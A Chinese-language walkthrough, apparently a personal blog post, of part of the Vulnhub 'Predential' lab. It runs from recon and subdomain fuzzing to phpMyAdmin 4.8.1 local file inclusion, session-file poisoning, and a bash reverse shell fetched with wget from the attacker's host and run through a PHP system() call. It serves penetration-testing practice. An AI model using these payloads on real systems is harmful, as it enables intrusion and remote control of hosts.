Vulnhub之Predential(部分)靶机测试过程
Predential
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:9d:62:91 1 60 PCS Systemtechnik GmbH
192.168.56.119 08:00:27:a4:aa:48 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.119
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 22:42 EDT
Nmap scan report for localhost (192.168.56.119)
Host is up (0.00085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.5.38)
|_http-title: Ontario Election Services » Vote Now!
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.5.38
2082/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 0640f4e58cad1ae686dea575d0a2ac80 (RSA)
| 256 e9e63a838e94f298dd3e70fbb9a3e399 (ECDSA)
|_ 256 66a8a19fdbd5ec4c0a9c4d53156c436c (ED25519)
MAC Address: 08:00:27:A4:AA:48 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds
NMAP扫描结果表明目标主机有2个开放端口:80(http)、2082(ssh)
获得Shell
浏览器访问80端口,有:
contact@votenow.local
目录扫描未果。
但是用dirsearch却发现了一个文件
─(kali㉿kali)-[~/Vulnhub/Predential]
└─$ dirsearch -u http://192.168.56.119
[23:16:02] 200 - 0B - /config.php
[23:16:02] 200 - 107B - /config.php.bak
[23:16:07] 200 - 11KB - /index.html
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ curl http://192.168.56.119/config.php.bak
<?php
$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";
?>
──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ ssh votebox@192.168.56.119 -p 2082
The authenticity of host '[192.168.56.119]:2082 ([192.168.56.119]:2082)' can't be established.
ED25519 key fingerprint is SHA256:d+Zod13cfhVNilw/xRRCqquMQdOhDdQ1RVwTzx0mUdo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.119]:2082' (ED25519) to the list of known hosts.
votebox@192.168.56.119: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
这时候不难想到一个ip可能绑定多个域名,或许可以通过查找其子域名来发现突破点。
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 votenow.local
接下来爆破一下子域名:
─$ wfuzz -c -u 'http://votenow.local/' -H 'Host:FUZZ.votenow.local' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 854,45
得到子域名为datasafe
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 votenow.local
192.168.56.119 datasafe.votenow.local
此时访问datasafe.votenow.local,发现为phpmyadmin,并且可知版本为4.8.1
https://www.exploit-db.com/exploits/50457
注意该代码表明以下的URL存在本地文件包含:
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
得到以下返回:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin admin:x:1000:1000::/home/admin:/bin/bash mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
Open new phpMyAdmin window
执行:
select '<?php phpinfo();exit;?>'
在浏览器开发者工具中找到session
将cookie中的session值填入url:
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_f9p26kcuq6nu2hu08rufs2iro74871lr
证明可以执行命令,接下来创建shell脚本:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ vim shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
开启web server
然后在phpmyadmin中执行sql语句:
select '<?php system("wget 192.168.56.206:8000/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
但是执行虽然没有报错,但是没有得到shell,不知道哪个环节出现了问题。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
